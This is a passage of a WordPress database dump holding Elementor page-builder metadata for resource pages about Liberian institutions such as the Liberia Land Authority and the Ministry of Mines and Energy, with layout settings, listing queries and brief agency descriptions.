More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"moa\\\",\\\"tag_id\\\":\\\"61\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"moa\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc19bed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1cf2e8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d176b2f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"759bc05\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"138bbb1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"bb7acbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"855e3aa\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:moa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8981,1600,'_dp_original','1598'),(8982,1600,'_edit_last','42'),(8984,1602,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8985,1602,'slide_template','default'),(8987,1602,'_elementor_template_type','wp-post'),(8988,1602,'_elementor_version','2.7.5'),(8989,1602,'_wp_page_template','default'),(8990,1602,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9160c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Liberia Land Authority (LLA) is a product of the policy, legal and institutional reform of the land sector of Liberia led by the Erstwhile Land Commission. The LLA, established by an Act of the National Legislature on October 6, 2016, as an autonomous agency of the Government with operational independence, subsumes land functions that were performed by several agencies of the Government, including the key land administration agencies - Department of Lands, Survey and Cartography of the former Ministry of Lands, Mines and Energy (MLME), now the Ministry of Mines and Energy, the Deeds and Titles Registry of the Center for National Documents Records Agency (CNDRA), and functions of County Land Commissioners from the Ministry of Internal Affairs.<\\/p><p>The LLA\'s mandate of the Authority is to develop policies on a continuous basis, undertake actions and implement programs in support of land governance, including land administration and management in Liberia.\\u00a0<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"272fc6b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"c718620\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98dfd4f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"0986fea\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"lla\\\",\\\"tag_id\\\":\\\"57\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"lla\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eea10f6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"cc28ee8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a346330\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"390048a\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:lla\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8991,1602,'_dp_original','1600'),(8992,1602,'_edit_last','42'),(8994,1604,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8995,1604,'slide_template','default'),(8997,1604,'_elementor_template_type','wp-post'),(8998,1604,'_elementor_version','2.7.5'),(8999,1604,'_wp_page_template','default'),(9000,1604,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ddbf8c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"National Concession information coming soon!\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7ae54ef2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"50d3d3a2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7172f56c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"29eecb5b\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"concessions\\\",\\\"tag_id\\\":\\\"51\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"concessions\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4bb76f44\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"6e4d7076\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"19203562\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"58c6b4a8\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:concessions\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(9002,1604,'_dp_original','1602'),(9003,1604,'_edit_last','42'),(9004,1606,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(9005,1606,'slide_template','default'),(9007,1606,'_elementor_template_type','wp-post'),(9008,1606,'_elementor_version','2.7.5'),(9009,1606,'_wp_page_template','default'),(9010,1606,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6ba7389\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>LiMA coming soon!<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5cce3400\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"18267993\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"37219f1f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ab5334\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"lima\\\",\\\"tag_id\\\":\\\"58\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"lima\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"55f0c58f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"126f7a36\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"41e8be5a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1f1d95fa\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:lima\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(9012,1606,'_dp_original','1604'),(9013,1606,'_edit_last','42'),(9014,1608,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(9015,1608,'slide_template','default'),(9017,1608,'_elementor_template_type','wp-post'),(9018,1608,'_elementor_version','2.7.5'),(9019,1608,'_wp_page_template','default'),(9020,1608,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.<\\/p><p>The Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 \\u2013 2015) program that was signed in 2010.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0006e2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e3150d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9d44d7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"14b21ae\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read 